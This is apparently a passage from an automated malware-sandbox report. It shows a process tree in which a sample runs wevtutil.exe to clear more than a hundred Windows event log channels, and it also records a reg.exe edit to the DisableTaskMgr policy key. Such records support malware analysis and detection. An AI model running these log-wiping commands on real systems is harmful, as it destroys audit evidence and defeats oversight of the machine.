wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
3⤵
- Clears Windows event logs
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
3⤵
PID:3056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
3⤵
PID:2176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
3⤵
PID:2152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
3⤵
PID:2076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
3⤵
PID:2236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
3⤵
PID:2216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
3⤵
- Clears Windows event logs
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
3⤵
PID:2336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
3⤵
PID:620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
3⤵
PID:2420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
3⤵
- Clears Windows event logs
PID:2432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
3⤵
PID:2408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
3⤵
PID:2444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
3⤵
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
3⤵
PID:2504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
3⤵
PID:2388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
3⤵
PID:2484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
3⤵
PID:2536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
3⤵
PID:2520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
3⤵
- Clears Windows event logs
PID:2572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
3⤵
PID:2564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
3⤵
PID:2544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
3⤵
PID:2596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
3⤵
PID:2584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
3⤵
PID:2628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
3⤵
PID:2644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
3⤵
PID:2660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
3⤵
PID:2696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
3⤵
PID:2712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
3⤵
PID:2732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
3⤵
PID:2760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
3⤵
PID:2776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
3⤵
PID:2756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
3⤵
PID:2840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
3⤵
PID:2856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
3⤵
- Clears Windows event logs
PID:2880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
3⤵
PID:2896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
3⤵
- Clears Windows event logs
PID:2928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
3⤵
PID:2944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
3⤵
PID:2960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
3⤵
PID:2976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
3⤵
PID:2992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
3⤵
PID:3008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
3⤵
- Clears Windows event logs
PID:3040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
3⤵
PID:2144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
3⤵
PID:2292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
3⤵
- Clears Windows event logs
PID:2216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
3⤵
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
3⤵
PID:2336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
3⤵
PID:620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
3⤵
PID:2420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
3⤵
PID:2432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
3⤵
PID:2456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
3⤵
PID:2496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
3⤵
PID:2472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
3⤵
- Clears Windows event logs
PID:2552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
3⤵
PID:2612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
3⤵
PID:2548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
3⤵
- Clears Windows event logs
PID:2604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
3⤵
PID:2588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
3⤵
PID:2616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
3⤵
PID:2632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
3⤵
PID:2648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
3⤵
PID:2668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
3⤵
PID:2680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
3⤵
PID:2736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
3⤵
PID:2764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
3⤵
PID:2780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
3⤵
PID:2796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
3⤵
PID:2820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
3⤵
PID:2816

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
4⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
3⤵
PID:2844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
3⤵
PID:2860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
3⤵
PID:2852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
3⤵
PID:2868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
3⤵
PID:2884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
3⤵
PID:2928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
3⤵
PID:2944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
3⤵
PID:2960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
3⤵
PID:2964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
3⤵
PID:2980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
3⤵
PID:2996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
3⤵
PID:3020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
3⤵
PID:3044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
3⤵
PID:2136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
3⤵
PID:860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
3⤵
PID:3024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
3⤵
- Clears Windows event logs
PID:2212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
3⤵
PID:2204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
3⤵
PID:2144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
3⤵
PID:2076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
3⤵
PID:2236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
3⤵
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
3⤵
PID:2316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
3⤵
PID:2424

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
3⤵
PID:2384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
3⤵
PID:2368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
3⤵
PID:2380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
3⤵
- Clears Windows event logs
PID:2372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
3⤵
PID:2504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
3⤵
- Clears Windows event logs
PID:2532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
3⤵
PID:2540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
3⤵
PID:904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
3⤵
PID:1572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
3⤵
PID:1108

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
3⤵
PID:2472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
3⤵
PID:2552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
3⤵
- Clears Windows event logs
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
3⤵
- Clears Windows event logs
PID:384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
3⤵
PID:2556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
3⤵
PID:2608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
3⤵
PID:2600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
3⤵
PID:2580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
3⤵
PID:2624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
3⤵
PID:2640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
3⤵
- Clears Windows event logs
PID:2656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
3⤵
PID:2692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
3⤵
PID:2708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
3⤵
PID:2728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
3⤵
PID:2748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
3⤵
PID:2772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
3⤵
PID:2788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
3⤵
PID:2792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
3⤵
PID:2832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
3⤵
PID:2888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
3⤵
PID:2904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
3⤵
- Clears Windows event logs
PID:2920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
3⤵
PID:2936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
3⤵
PID:2956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
3⤵
PID:2972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
3⤵
PID:2988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
3⤵
PID:3016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
3⤵
PID:1792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
3⤵
PID:1060

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
3⤵
PID:952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
3⤵
- Clears Windows event logs
PID:3032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
3⤵
PID:2276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
3⤵
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
3⤵
PID:2220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
3⤵
PID:2176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
3⤵
PID:2208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
3⤵
PID:2292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
3⤵
PID:2216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
3⤵
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
3⤵
PID:2336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
3⤵
PID:620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
3⤵
PID:2420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
3⤵
- Clears Windows event logs
PID:2432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
3⤵
PID:2456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
3⤵
PID:2492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
3⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
3⤵
PID:1924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
3⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
3⤵
PID:584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
3⤵
- Clears Windows event logs
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
3⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
3⤵
PID:2004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
3⤵
PID:2564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
3⤵
PID:2544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
3⤵
PID:2596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
3⤵
PID:2584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
3⤵
PID:2628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
3⤵
PID:2644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
3⤵
PID:2660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
3⤵
PID:2696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
3⤵
PID:2712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
3⤵
PID:2732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
3⤵
PID:2760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
3⤵
PID:2776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
3⤵
PID:2756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
3⤵
- Clears Windows event logs
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
3⤵
PID:2840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
3⤵
PID:2856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
3⤵
PID:2880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
3⤵
PID:2896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
3⤵
PID:2952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
3⤵
PID:2932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
3⤵
PID:2984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
3⤵
PID:772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
3⤵
PID:2976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
3⤵
- Clears Windows event logs
PID:2992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
3⤵
- Clears Windows event logs
PID:3008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
3⤵
PID:3056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
3⤵
- Clears Windows event logs
PID:3012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
3⤵
PID:3040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
3⤵
PID:188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
3⤵
PID:2164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
3⤵
PID:2224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
3⤵
PID:2280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
3⤵
PID:2152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
3⤵
PID:2148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
3⤵
PID:2340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
3⤵
PID:2332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
3⤵
PID:2404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
3⤵
PID:2376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
3⤵
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
3⤵
PID:2460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
3⤵
PID:2468

